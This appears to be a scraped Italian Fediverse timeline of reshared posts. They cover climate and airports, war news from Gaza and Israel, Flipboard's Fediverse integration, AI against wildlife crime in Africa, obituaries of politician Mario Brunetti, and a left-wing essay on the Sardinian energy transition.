In Europa si continuano a costruire aeroporti, senza curarsi del gigantesco impatto dei voli aerei. Sia per il clima, sia per la salute
L'articolo I veleni degli aeroporti che nessuno vuole vedere proviene da Valori.
Notizie dall'Italia e dal mondo reshared this.
Dagli Usa altri 20 miliardi di dollari di armi per Israele. Razzi di Hamas verso Tel Aviv
@Notizie dall'Italia e dal mondo
Il Pentagono riferisce che è stata approvata anche la vendita di 33mila proiettili per carri armati immediatamente disponibili
L'articolo Dagli Usa altri 20 miliardi di dollari di armi per Israele. Razzi di Hamas verso Tel Aviv
Notizie dall'Italia e dal mondo reshared this.
Informa Pirata: informazione e notizie
Flipboard rafforza il suo legame con il Fediverso, social web open source https://feddit.it/post/10083405 Il nuovo post di notizie è su feddit.Telegram
Flipboard rafforza il suo legame con il Fediverso, social web open source
Flipboard, un'app di social magazine dell'era Web 2.0 che si sta reinventando per capitalizzare la spinta rinnovata verso un social web aperto , sta rafforzando i suoi legami con il #Fediverso, il social network di server interconnessi che include app come Mastodon, Friendica, Pixelfed, PeerTube, Wordpress e, col tempo, Instagram Threads, tra le altre.
Giovedì, la società ha annunciato che sta espandendo le sue integrazioni del Fediverso ad altri 400 creatori di contenuti in Flipboard e che sta introducendo le notifiche del fediverso nell'app Flipboard stessa.
Quest'ultima novità consentirà agli utenti di #Flipboard di vedere i loro nuovi follower e altre attività relative ai contenuti che condividono nel fediverse direttamente nell'app Flipboard. Ciò segue l'introduzione dell'anno scorso di un'integrazione di Mastodon nell'app , in sostituzione di Twitter, e l'introduzione del supporto per ActivityPub , il protocollo di social networking che alimenta i social network open source e decentralizzati che includono Mastodon e altri software.
reshared this
installance #0189: asemic square
slowforward.net/2024/08/13/ins…
installance n. : # 0189type : asemic square size : ~ cm 6 x 6record : lowres shotadditional notes : abandoneddate : Aug 6th, 2024time : 4:31pmplace : Rome, via Lancianofootnote : ---copyright : (CC) 2024 differx
.slowforward.net/2024/08/13/ins…
#000000 #0189 #abandoned #asemic #asemicSquare #card #i0189 #installance #installance0189
installance #0189: asemic square
installance n. : # 0189 type : asemic square size : ~ cm 6 x 6 record : lowres shot additional notes : abandoned date : Aug 6th, 2024 time : 4:31pm place : Rome, via Lanciano footnote : — c…slowforward
the ‘bureau of public secrets’: an astounding (situationist) archive
slowforward.net/2024/08/13/the…
bopsecrets.org/
bopsecrets.org/comics/return.h…_
e ci sono anche…Testi in Italiano
(Text in Italian)
Riflessioni preliminari sulla Guerra del Vietnam (Ngo Van, 1968)
Sulle lotte del Terzo Mondo (Ngo Van, 1968)
In questo teatro… (1970)
Ode sull’assenza di vera poesia oggi questo pomeriggio (1970)
Doppia riflessione (1974)
Avviso riguardo la società dominante e coloro che la contestano (1974)
I ciechi e l’elefante (1975)
La società del situazionismo (1976)
La realizzazione e la soppressione della religione (1977)
Lettera aperta al gruppo “Libertaire” di Tokio (1977)
La breccia in Iran (1979)
Banalità (1979)
La guerra e lo spettacolo (1991)
Sul film di René Viénet: Può la dialettica spezzare i mattoni? (1992)
Due saggi critici sul buddismo impegnato (1993 & 1999)
Confessioni di un garbato nemico dello stato (1997):
parte 1
parte 2
parte 3
Corrispondenza sulla questione della religione (1997-2000)
Riformismo y politica elettorale (2002)
Introduzione ai film di Guy Debord (2003)
Risposta ad un liberale del Midwest (2003)
Porta d’ingresso ai vasti domini (Introduzione) (2004)
Comprendere Debord dialetticamente (2005/2010)
Riflessioni sulla sollevazione in Francia (2006)
Documenti della sollevazione anti-CPE in Francia (2006)
Opinioni francofone sull’Ufficio dei Segreti Pubblici (2007-2008)
Ken Knabb, l’Internazionale Situazionista e la controcultura nord-americana (Jean-Pierre Depétris, 2008)
Introduzione al libro di Ngo Van In the Crossfire: Adventures of a Vietnamese Revolutionary (2010)
Nota sullo stalinismo e sul trotskismo (2010)
Il risveglio in America (2011)
Al di là del voto (2012/2016)slowforward.net/2024/08/13/the…
#000000 #anarchy #archive #bureauOfPublicSecrets #dance #durruti #ffffff #internationalSituationist #KennethRexroth #Situationism #situationistInternational #Situazionismo
L'Intelligenza artificiale (#AI) offre soluzioni innovative per la polizia dei crimini ambientali, riducendo costi e tempi
Un interessante studio apparso sul sito dell’ Institute for Securities Studies (ISS) approfondisce gli aspetti relativi all’ausilio che può fornire l’intelligenza artificiale alle forze di polizia impegnate nella lotta ai crimini ambientali, con particolare riguardo al continente africano (l’articolo è qui: issafrica.org/iss-today/ai-can…).
L'aspetto di maggior interesse è che l’AI può analizzare enormi quantità di dati in tempi brevi, identificando modelli di comportamento criminale e movimenti di beni illeciti.
Quali prima di tutto le sfide per i progetti di Intelligenza Artificiale nella lotta contro i crimini ambientali in Africa?
Innanzitutto, mancanza di dati locali: la disponibilità limitata e la scarsa qualità dei dati locali ostacolano l'efficacia dei modelli di IA, rendendo difficile l'analisi accurata delle attività illecite.
Quindi le infrastrutture inadeguate: la carenza di infrastrutture di comunicazione e digitali limita la capacità di implementare e gestire tecnologie avanzate in aree remote.
Ancora, risorse e competenze limitate: la mancanza di investimenti in ricerca, sviluppo e formazione tecnica riduce la capacità delle forze dell'ordine di utilizzare efficacemente l'AI nella lotta contro i crimini ambientali.
Quali invece i vantaggi dell'Intelligenza Artificiale nella lotta contro il bracconaggio?
In primis, risparmio di tempo e risorse: l'uso dell'AI consente di risparmiare ore di lavoro per le forze dell'ordine, migliorando l'efficienza operativa.
Poi il “rilevamento precoce”: l’AI consente un monitoraggio continuo e in tempo reale, identificando attività sospette e facilitando interventi tempestivi.
A seguire, nell’ambito del ciclo intelligence di polizia, l’analisi predittiva: utilizzando modelli predittivi, l'AI può anticipare le rotte di bracconaggio e le aree a rischio, migliorando la pianificazione delle operazioni di pattugliamento e fornendo, di conseguenza, efficienza operativa, poiché automatizzando l'analisi dei dati e il riconoscimento delle immagini, l'AI riduce il carico di lavoro per le forze dell'ordine, permettendo loro di concentrarsi su azioni concrete contro il bracconaggio mediante interventi tempestivi, grazie a tecnologie come TrailGuard (sistemi di telecamere intelligenti che utilizzano modelli per filtrare il 99% delle immagini false e inviare avvisi in tempo reale) permettono risposte rapide a minacce, facilitando l'arresto di criminali e la prevenzione di danni ambientali.
Ad esempio, progetti impiegano l’AI per riconoscere specie specifiche da immagini catturate, facilitando il monitoraggio della fauna selvatica, come Operation Pangolin lanciata nel 2023 come collaborazione tra università, iniziative di conservazione e l'Agenzia nazionale per i parchi nazionali del Gabon. Raccoglie ed elabora i dati dalle telecamere esistenti, utilizzando l'intelligenza artificiale per riconoscere i pangolini dalle trappole fotografiche e dalle telecamere termiche. Le immagini vengono utilizzate con i dati dello strumento di monitoraggio spaziale e reporting delle pattuglie dei ranger per costruire modelli predittivi per il bracconaggio dei pangolini. L'obiettivo a lungo termine del progetto è quello di sviluppare modelli di intelligenza artificiale separati che aiutino a prevedere le rotte e i mercati della tratta.
Del pari l’analisi dei dati satellitari, attuata mediante piattaforme come Digital Earth Africa e Skylight la utilizzano per analizzare dati geospaziali e identificare attività illecite come l'estrazione mineraria e la pesca illegale. Si tratta del così detto monitoraggio avanzato: questi progetti utilizzano tecnologie di intelligenza artificiale per analizzare dati da telecamere e strumenti di monitoraggio, migliorando la capacità di rilevare e rispondere a minacce come il bracconaggio.
Focalizzandosi sulla costruzione di capacità locali, questi progetti garantiscono che le tecnologie e i dati rimangano utili anche oltre la loro durata, promuovendo una gestione sostenibile della fauna selvatica.
In conclusione, investimenti in capacità locali e legislazione sull'IA sono necessari per migliorare l'efficacia della lotta contro i crimini organizzati.
Articoli correlati:
poliverso.org/display/0477a01e…
noblogo.org/cooperazione-inter…
#ENDENVCRIME #WILDLIFEtrafficking
'She Turned Ghost White:' How a Ragtag Group of Friends Tracked Down a Sex Trafficking Ringleader
Michael Pratt hid a massive sex trafficking ring in plain sight on PornHub. On the run from the FBI, an unexpected crew of ex-military, ex-intelligence officers and a lawyer tracked him down using his love of rare sneakers and crypto.#girlsdoporn
La vergognosa assenza del Governo Meloni alla cerimonia per la strage di Sant’Anna di Stazzema
@Politica interna, europea e internazionale
Con mia moglie Rosalba e il procuratore militare generale Marco De Paolis domenica 12 agosto sono salito a Sant’Anna di Stazzema, il borgo collinare in Versilia dove il 12 agosto 1944 – ottant’anni fa esatti – si consumò una delle più crudeli stragi
like this
Politica interna, europea e internazionale reshared this.
Sandro Pertini – Sei condanne, Due evasioni
L'articolo Sandro Pertini – Sei condanne, Due evasioni proviene da Fondazione Luigi Einaudi.
Politica interna, europea e internazionale reshared this.
8 anni di GDPR: La carta fedeltà di un supermercato greco non è ancora conforme
noyb ha presentato un reclamo contro il supermercato greco Alfa Vita (AB)
mickey13 August 2024
Elogio dell’equità: quando la manovra finanziaria dell’Italia vale metà del compenso di Elon Musk
@Notizie dall'Italia e dal mondo
Il nuovo articolo di @valori
Disuguaglianza alle stelle: il compenso di Musk è quasi un milione di volte quello che guadagna in un anno un dipendente della Tesla
L'articolo Elogio dell’equità: quando la manovra finanziaria dell’Italia vale metà del compenso di Elon Musk proviene da
Notizie dall'Italia e dal mondo reshared this.
Ci ha lasciato oggi, a 92 anni, il compagno Mario Brunetti, intellettuale calabrese meridionalista, esponente della comunità arbëreshe, socialista e comunista democratico che è rimasto sempre fedele alla lezione di Antonio Gramsci e Rodolfo Morandi.
Mario Brunetti per tre mandati è stato parlamentare di Rifondazione Comunista, dopo una lunga militanza nello Psiup, nel PdUP e in Democrazia Proletaria. Ci ha lasciato, nel lavoro fatto come Presidente del Comitato dei diritti umani della Commissione Esteri della Camera, delle importanti testimonianze scritte.
Nel 1998 seguì Cossutta nella scissione ma tornò dopo alcuni anni a collaborare con Rifondazione per la sua netta opposizione allo stravolgimento della Costituzione – dal contrasto alle famigerate modifiche del Titolo V, all’opposizione ai diversi e pericolosi tentativi di cambiamento avvenuti nel corso degli ultimi decenni. La nostra comune battaglia si è infine rinforzata nel denunciare, insieme e per primi, le pericolosità insite nei propositi leghisti volti ad affermare l’Autonomia differenziata.
Non possiamo dimenticare il suo infaticabile lavoro di meridionalista e di difensore dei diritti e delle peculiarità delle minoranze etniche nonché l’organizzazione ultratrentennale degli Itinerari Gramsciani: in questo quadro, grazie alle sue ricerche ed ai suoi studi, è stato possibile conoscere e datare con precisione le origini arbëreshe, di Plataci (Cs), della famiglia paterna di Antonio Gramsci.
Con Mario perdiamo un intellettuale di assoluto valore, un compagno che ha messo il suo sapere al servizio della sua terra e un militante della sinistra autentica che ha onorato il nostro partito con un lavoro instancabile per la causa della Pace e della giustizia sociale. Il suo esempio di lavoro culturale e politico e i suoi libri rappresentano un’eredità fondamentale.
Domani alle 17:30, alla Villa vecchia di Cosenza gli daremo, insieme ai suoi cari familiari ed ai loro amici, l’ultimo saluto laico con le nostre bandiere rosse al vento.
Maurizio Acerbo, segretario nazionale
Mimmo Serrao, segretario regionale Calabria
Gianmaria Milicchio, segretario provinciale Cosenza
Partito della Rifondazione Comunista – Sinistra Europea
Enrico Lai*
Risulterebbe parecchio singolare che la politica si affidi al capitale e al libero mercato per avviare la transizione energetica in Sardegna.
Quello stesso libero mercato e quello stesso capitale che nel sistema di accumulo capitalista, a partire dall’industria fordista dell’900 in poi, ha sfruttato il territorio inquinandolo e mai bonificandolo e ha sfruttato tantissime masse di lavoratrici e lavoratori lasciando sul territorio disoccupazione e malattie. Possono essere quindi loro stessi a porsi alla guida col “placet” della politica di governo nella transizione energetica? Verrebbe da dire spudoratamente “not in my name”.
Affidarsi armi e bagagli a lor signori, ovvero gli stessi che hanno prodotto crisi climatiche, ambientali, sanitarie e occupazionali, è il peggio che possiamo augurarci per il nostro futuro. Quindi il timore che il tema del “pubblico” a limitazione del “laissez faire” liberista e neoliberista non entri con prepotenza nel dibattito politico, così come purtroppo non sta avvenendo, lascia presagire che il “mito della caverna” di Platone sia più che una realtà tangibile.
Ad oggi ho il timore che si guardi e si ragioni su delle ombre proiettate appunto alla fine della caverna e non sulla realtà concreta ed essenziale dei fatti. Basta voltarsi per vedere la luce del sole e la “verità”. In fin dei conti dopo anni di narrazioni sulla dicotomia “privato bello, pubblico brutto” non sorprende che questo motto sia diventato senso comune in diversi strati di popolazione ed egemone nella quasi totalità della classe politica. Oggi più che mai, ritengo, sia indispensabile ribaltare seccamente questo concetto della “mano invisibile” di Adam Smith.
La transizione energetica o la si fa o non la si fa. “Tertium non datur”. Ritengo che adoperarsi a favore sia un obbligo civile e un dovere politico improcrastinabile della classe dirigente per lasciare un mondo migliore, ma soprattutto per salvaguardarlo, ai nostri figli e ai nostri nipoti. Questo è un punto che deve coinvolgere tutte e tutti. In qualunque ambito lavorativo, istituzionale e sociale a partire dalla conoscenza e dall’istruzione nelle scuole primarie. Purtroppo poco si parla nel dibattito pubblico di ciò. La comunità scientifica da decenni ormai è unanime nel ritenere che i cambiamenti climatici con fenomeni sempre più estremi, frequenti e devastanti in larga misura derivanti dall’uso di combustibili fossili rischiano di lasciarci un mondo completamente differente da come lo conosciamo.
A partire dai mutamenti di flora, fauna e clima fino all’allarme più devastante che è quello dell’immigrazione climatica. L’UNHCR (alto commissariato delle nazioni unite per i rifugiati) stima che all’anno ci siano circa 20 milioni di persone obbligate a emigrare a causa del clima con conseguente destabilizzazione antropologica delle stesse comunità e una mutazione irreversibile della società mondiale con tutti i danni economici prodotti a corollario. Questo perché è indispensabile avere un approccio scientifico e non moralista al tema. E’ lo snodo centrale.
La transizione energetica scollegata da una lettura storica del sistema di accumulo capitalista che non tiene in considerazione la “questione di classe”, sarebbe mero “giardinaggio”. Così come il rifiuto della realtà e del principio “non nel mio giardino” non farebbe altro che produrre una situazione peggiorativa del quadro economico e ambientale. Nel solco di conquista del territorio sardo avviato dalla speculazione delle multinazionali del sole e del vento, ci viene sempre in aiuto Marx. Ad oggi siamo davanti a un attacco colonialista, figlio del capitalismo e nipote della globalizzazione. La transizione energetica va immaginata partecipata, democratica, riconosciuta ma in particolar modo voluta. Soprattutto voluta perché necessaria e non rimandabile.
Nell’ambito di una seppur debole autonomia speciale la Sardegna all’articolo 4 del proprio Statuto Speciale può legiferare in merito alla produzione e alla distribuzione dell’energia elettrica. Esiste quindi uno strumento che ci permetterebbe di limitare fortemente la “deregulation” parafrasando Humphrey Bogart: “è il mercato bellezza, e non puoi farci niente!”. Forse può essere non è esattamente così. E fa vibrare le vene ai polsi il fatto che non lo si riconosca come strumento efficace e utile per avviare delle scelte e una seria programmazione in tal senso.
Già negli anni ‘60 la stessa DC si dichiarava indisponibile alla privatizzazione dell’energia in Italia. Su questo ci tornerò con più precisione e dettaglio. Ad oggi però è utile sottolineare che da parte della giunta regionale non è previsto nessun piano energetico che sappia indicare puntualmente quali tipologie di energie rinnovabili ma solo la ricerca affannosa nell’individuazione di aree idonee all’installazione degli impianti di produzione privata per limitare le giuste preoccupazioni, totalmente fondate, delle sarde e dei sardi.
Faccio notare che nel 2006, anche noi come Partito della Rifondazione Comunista della Sardegna volevamo fortemente, anche a seguito della legge Salvacoste del compianto Luigi Cogodi, votando poi a favore del Piano Paesaggistico Regionale. PPR, costruito di concerto col ministero e le comunità locali, appunto per bloccare la speculazione dei “mattonari” e questo elemento lo rivendichiamo con estremo orgoglio tutt’oggi. Il PPR prevede già su tutti i comuni costieri quelle aree e quei beni individui tutelati che non possono essere alla mercé di nessuno, tantomeno degli autoproclamati “signori del vento”.
Non risulterebbe banale che, uno strumento che ha dato prova positiva e che continua a darla nel suo funzionamento, debba essere recuperato nell’ambito della mappatura delle zone interne invece che demonizzarlo e brandirlo come uno spauracchio solo perché antipatico al centrodestra e allo stesso PD che ha deciso persino di interrompere anticipatamente una legislatura regionale su questo preciso punto. Gli strumenti esistono già, usiamoli, miglioriamoli e adeguiamoli alle nuove esigenze che la fase storica ci pone davanti. Per questo nutro delle perplessità di natura giuridica in merito alla proposta di legge proveniente da più parti chiamata “Pratobello”, sebben sia un’iniziativa nobile e giusta che prova a dare una risposta alla salvaguardia del territorio sardo contro la speculazione arrembante e merita particolare attenzione e riconoscimento da parte di tutte e tutti.
Preciso, essendo utile, che noi fummo tra i pochi che posero all’attenzione del governo i vizi di incostituzionalità dell’ultimo Piano Casa della “giunta Solinas”. E la Corte Costituzionale esprimendosi qualche mese fa confermò l’orientamento giuridico già assunto in precedenza, ovvero il paesaggio e l’ambiente non è appannaggio esclusivo in termini di competenze della Regione di fatto cassandolo praticamente in tutta la sua interezza.
Per questo buttare fumo negli occhi delle sarde e dei sardi evocando la più nota rivolta di Pratobello del 1969, con dispiegamento di vele mediatiche così come sta facendo l’Unione Sarda, rischia di non rendere onore alla storia intrinseca sulla portata culturale di quel movimento, ma soprattutto di non produrre gli effetti sperati da tutti, ovvero arrestare oggi, non domani, ma soprattutto neanche dopodomani la speculazione sul territorio.
Ritengo utile sottolineare che il direttore dell’Unione Sarda in un editoriale del 16 giugno sotto forma di lettera aperta alla presidente Giorgia Meloni e rivolgendosi a lei scriveva: ”Ci eravamo illusi, Cara Giorgia, quando incontrando il presidente algerino nel gennaio 2023 Lei rispolverò il gasdotto Sardegna-Italia. Ma forse avevamo capito male. Ora il disegno è chiarissimo: neppure un atomo di metano”. Una domanda sorge quindi francamente spontanea: la strenua e intransigente difesa del territorio identitario sardo proposto dall’Unione Sarda come si concilia con la metanizzazione attraverso una dorsale del gas che attraversa in lungo e in largo la Sardegna? Ma soprattutto come si concilia con la stessa transizione energetica? Ai posteri l’ardua sentenza.
Alcuni mesi fa, noi insieme ad altre forze, parlavamo di “agenzia sarda pubblica dell’energia”. E in sintonia col già richiamato articolo 4 dello Statuto Speciale oggi assume una connotazione di attualità sorprendente nell’ambito di un reale cambio di paradigma di produzione di beni e servizi. Un cambio che da una situazione di difesa strenua del territorio può passare a una situazione di limpida e cristallina opportunità per le sarde e i sardi.
L’agenzia, in cui il pubblico detiene la proprietà dell’energia prodotta, avrebbe la possibilità non solo di creazione di nuovi posti di lavoro ma soprattutto di realizzare parecchi utili da reinvestire sullo stato sociale come politiche attive del lavoro, sanità e scuola pubblica. Far passare, seduti sulla riva del fiume, questa opportunità sarebbe francamente deleterio, così come consegnarla ai privati. Con ogni evidenza nell’ambito della mappatura delle aree, di concerto con le comunità locali, nell’ambito della programmazione di quali e quante energie si debbano installare è imprescindibile trovare il giusto equilibrio. Non può esserci giustizia climatica senza giustizia sociale.
Il combinato disposto di PPR con l’Agenzia Sarda Pubblica dell’Energia è una delle soluzioni a parer mio più credibili che possono sottrarre dalla speculazione il territorio da una parte e avviare un effetto volano di natura economica per il benessere delle sarde e dei sardi dall’altra.
*Segretario regionale Sardegna, PRC-S.E. da “Il Manifesto sardo
Sulle energie rinnovabili il libero mercato è parte del problema e non della soluzione
Enrico Lai* Risulterebbe parecchio singolare che la politica si affidi al capitale e al libero mercato per avviare la transizione energetica in Sardegna.Rifondazione Comunista
Giovanni Russo Spena
Quest’anno “Itinerari gramsciani” a Plataci non si terrà, purtroppo. Il suo ideatore, il suo appassionato organizzatore , Mario Brunetti, poche ore fa, è morto. Ho conosciuto Mario nel 1972, quando fummo, insieme a Vittorio Foa, Pino Ferraris, , Silvano Miniati, Domenico Jervolino, Giangiacomo Migone , tra le altre e gli altri, fondatori del Nuovo Psiup/Sinistra Mpl e, poi, del Pdup, con le compagne e i compagni de “il manifesto”. Sini al percorso che portò a Democrazia Proletaria. Mario è stato, per me, un fratello maggiore; mi ha insegnato tanto. La sua splendida famiglia è stata (ed è) la mia famiglia. Evito qui elogi funebri, che Mario, sempre così sobrio, non amava. Ricordo solo che è stato un parlamentare importante, un coerente partigiano della Costituzione. Ha interpretato la sua funzione non solo come raffinato conoscitore e studioso delle aule e delle commissioni parlamentari, ma, soprattutto, nelle strade, nei luoghi di lavoro e della mancanza di lavoro, nei villaggi sperduti della globalizzazione, in Italia, come nell’America Latina, come nel Medio Oriente.
Nei luoghi delle ingiustizie e delle diseguaglianze, nei meandri del dolore, negli spazi delle lotte , delle rivolte, delle ribellioni. Abbiamo scritto insieme articoli, saggi per Sinistra Meridionale, che è l’amata creatura editoriale di Mario. Rigoroso e lucidissimo intellettuale, arbereshe. Stavamo, in questi giorni, discutendo di un convegno per sottolineare i danni che l’”autonomia differenziata” avrebbe prodotto per il Sud : una sorta di discussione /inchiesta popolare , come facemmo, guidati da Pino Ferraris, all’epoca della “rivolta” di Reggio Calabria. Mario è, infatti, un padre del meridionalismo contemporaneo. Un meridionalismo gramsciano, come ripeteva con convinzione. E si arrabbiava con noi, donne e uomini di sinistra, perché avevamo, sosteneva, sostanzialmente rimosso il Mezzogiorno dalle nostre strategie. “Il Sud non è un orpello; è centrale per pensare la rivoluzione”, ci ripeteva con accorata testardaggine. Mario ha formato, culturalmente e politicamente, tante ragazze e tanti giovani che saranno i nuovi meridionalisti. Intanto, mi sento (ci sentiamo), oggi, spaesati, molto soli. Senza Mario, orgogliosamente e liberamente comunista
per Mario Brunetti
Giovanni Russo Spena Quest'anno "Itinerari gramsciani" a Plataci non si terrà, purtroppo. Il suo ideatore, il suo appassionato organizzatore , MarRifondazione Comunista
GAZA. 100 uccisi nel bombardamento della scuola Al Tabin. Evacuazioni a Khan Yunis
@Notizie dall'Italia e dal mondo
Tra le vittime donne e bambini. Decine i feriti sono alcuni in fin di vita. L'ennesimo attacco a una scuola palestinese piena di sfollati è stato spiegato da Israele come il bombardamento di un "centro di comando di Hamas". Nuova incursione a
Notizie dall'Italia e dal mondo reshared this.
Einaudi: il pensiero e l’azione – “Il buongoverno” con Paolo Silvestri
[quote]Il buongoverno nel pensiero di Einaudi e la sua concezione del liberalismo. Rubrica “Einaudi: il pensiero e l’azione”
L'articolo Einaudi: il pensiero e l’azione – “Il buongoverno” con fondazioneluigieinaudi.it/eina…
Tre obiettori dell’esercito israeliano: “Non parteciperemo al genocidio”
@Notizie dall'Italia e dal mondo
Gli obiettori di coscienza Yuval Moav, Itamar Greenberg e Oryan Mueller spiegano perché sono disposti ad andare in prigione pur di opporsi alla guerra.
L'articolo Tre obiettori dell’esercito israeliano: “Non parteciperemo al genocidio” proviene da Pagine Esteri.
Notizie dall'Italia e dal mondo reshared this.
OrionBelt©
in reply to Informa Pirata • • •Informa Pirata likes this.
Informa Pirata reshared this.
Informa Pirata
in reply to OrionBelt© • •